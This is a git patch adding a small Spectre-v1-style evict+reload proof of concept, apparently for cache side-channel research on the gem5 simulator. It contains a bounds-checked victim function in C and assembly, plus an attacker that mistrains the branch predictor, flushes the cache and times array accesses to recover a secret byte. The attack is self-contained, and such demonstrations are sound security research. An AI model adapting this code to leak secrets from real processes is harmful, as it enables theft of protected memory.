From 612ad09b9825a032742ae2a2de20628bac97154b Mon Sep 17 00:00:00 2001
From: Iru Cai <mytbk920423@gmail.com>
Date: Wed, 10 Apr 2019 16:00:23 +0800
Subject: add evice+reload attack code

---
 attack_code/evict_load/attack.c   | 50 +++++++++++++++++++++++++++++++++++++++
 attack_code/evict_load/build.sh   |  4 ++++
 attack_code/evict_load/victim.asm | 22 +++++++++++++++++
 attack_code/evict_load/victim.c   | 16 +++++++++++++
 4 files changed, 92 insertions(+)
 create mode 100644 attack_code/evict_load/attack.c
 create mode 100755 attack_code/evict_load/build.sh
 create mode 100644 attack_code/evict_load/victim.asm
 create mode 100644 attack_code/evict_load/victim.c

diff --git a/attack_code/evict_load/attack.c b/attack_code/evict_load/attack.c
new file mode 100644
index 000000000..85a2017f0
--- /dev/null
+++ b/attack_code/evict_load/attack.c
@@ -0,0 +1,50 @@
+#include <stdio.h>
+#include <stdint.h>
+#include <string.h>
+#include <x86intrin.h>
+
+/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */
+#define LLC_SIZE (2 << 20)
+
+uint8_t dummy[LLC_SIZE];
+size_t array_size = 4;
+uint8_t array1[200] = {1, 2, 3, 4};
+uint8_t array2[256 * 64 * 2];
+uint8_t X;
+uint8_t array3[4096];
+uint8_t tmp;
+
+uint8_t  victim(size_t idx);
+
+int main()
+{
+	unsigned long t[256];
+	volatile uint8_t x;
+
+	victim(0);
+	victim(0);
+	victim(0);
+	victim(0);
+	victim(0);
+
+	memset(dummy, 1, sizeof(dummy)); // flush L2
+	X = 123; // set the secret value, and also bring it to cache
+
+	_mm_mfence();
+
+	size_t attack_idx = &X - array1;
+	victim(attack_idx);
+
+	for (int i = 0; i < 256; i++) {
+		unsigned int junk;
+		unsigned long time1 = __rdtscp(&junk);
+		x ^= array2[i * 64];
+		unsigned long time2 = __rdtscp(&junk);
+		t[i] = time2 - time1;
+	}
+
+	printf("attack_idx = %ld\n", attack_idx);
+	for (int i = 0; i < 256; i++) {
+		printf("%d: %d, %s\n", i, t[i], (t[i] < 40)? "\x1b[1;31mhit\x1b[m": "miss");
+	}
+}
diff --git a/attack_code/evict_load/build.sh b/attack_code/evict_load/build.sh
new file mode 100755
index 000000000..6235809c6
--- /dev/null
+++ b/attack_code/evict_load/build.sh
@@ -0,0 +1,4 @@
+#!/bin/sh
+
+nasm -f elf64 victim.asm
+gcc -O2 -o ../../attack attack.c victim.o
diff --git a/attack_code/evict_load/victim.asm b/attack_code/evict_load/victim.asm
new file mode 100644
index 000000000..bd3effbc3
--- /dev/null
+++ b/attack_code/evict_load/victim.asm
@@ -0,0 +1,22 @@
+; code similar to gcc -O2 -c victim.c, working on gem5
+; it doesn't store rdi to stack as -O0
+
+extern array1
+extern array2
+extern array_size
+
+global victim
+
+victim:
+xor eax, eax
+cmp [rel array_size], rdi
+jbe fret
+lea rax, [rel array1]
+add rax, rdi
+movzx eax, byte [rax]
+shl eax, 6
+cdq
+lea rdx, [rel array2]
+mov eax, [rdx + rax]
+fret:
+rep ret
diff --git a/attack_code/evict_load/victim.c b/attack_code/evict_load/victim.c
new file mode 100644
index 000000000..e9d3249bf
--- /dev/null
+++ b/attack_code/evict_load/victim.c
@@ -0,0 +1,16 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <x86intrin.h>
+
+extern uint8_t array1[];
+extern uint8_t array2[];
+extern size_t array_size;
+
+uint8_t victim(size_t idx)
+{
+	if (idx < array_size) {
+		return array2[array1[idx] * 64];
+	}
+	return 0;
+}
+
-- 
cgit v1.2.3